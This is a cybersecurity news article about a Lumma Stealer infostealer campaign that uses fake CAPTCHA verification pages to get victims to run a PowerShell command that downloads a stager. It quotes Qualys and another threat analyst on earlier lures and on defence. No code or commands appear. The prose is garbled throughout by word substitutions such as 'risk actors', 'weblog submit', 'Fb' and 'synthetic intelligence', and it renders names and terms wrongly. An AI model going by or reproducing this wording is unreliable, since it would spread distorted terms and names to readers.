Lumma Stealer stars in a brand new marketing campaign that makes use of malicious CAPTCHA pages to rip-off targets into clicking via the “verification” course of — triggering the preliminary malware obtain.
Malware-as-a-service (MaaS) Lumma Stealer is usually utilized by risk actors to steal delicate data like passwords and crypto-wallet information, researchers at Qualys, who lately detailed the newest assault chain, defined.
“When the consumer clicks the ‘I am not a robotic’ button, verification steps are offered,” Qualys risk researcher Vishwajeet Kumar wrote in a weblog submit detailing the newest Lumma Stealer discover. “Finishing these steps triggers the execution of a PowerShell command that initiates the obtain of an preliminary stager (malware downloader) on the goal machine.”
Lumma Stealer’s Simple Adaptability
This newest CAPTCHA-based tactic is new, Kumar added within the Lumma Stealer marketing campaign evaluation. Earlier campaigns have relied on a wide selection of cybercrimes to unfold the infostealer, starting from fundamental phishing to way more unique gambits.
Only a handful of examples from simply this 12 months embrace a Lumma Stealer marketing campaign from January 2024 that used YouTube channels disguised as content material to supply workarounds for eluding Internet filters and cracking widespread functions.
By the summer season, one other Lumma Stealer effort popped up on Fb, this time attempting to lure victims into downloading a reliable synthetic intelligence (AI) photograph editor. Even Hamster Kombat wasn’t spared. The greater than 250 million estimated gamers of the sport had been focused and lured into downloading Lumma Stealer by a number of simultaneous scams, it was found final July.
“The investigation into Lumma Stealer reveals an evolving risk panorama characterised by the malware’s capability to adapt and evade detection,” Kumar wrote. “It employs a wide range of ways, from leveraging reliable software program to using misleading supply strategies, making it a persistent problem for safety groups.”
Defending from ongoing Lumma Stealer threats requires shut collaboration between risk intelligence, safety operations facilities (SOCs), and incident-response groups, based on Sarah Jones, a cyber-threat intelligence analysis analyst at Vital Begin.
“Given the speedy evolution of threats like Lumma Stealer, safety groups should undertake a stance of steady monitoring and adaptation, recurrently updating detection guidelines, indicators of compromise, and safety controls,” Jones says. “This marketing campaign exemplifies the delicate threats organizations face immediately, requiring a multilayered protection method that mixes superior technical controls with proactive risk looking and ongoing adaptation to successfully fight evolving malware campaigns.”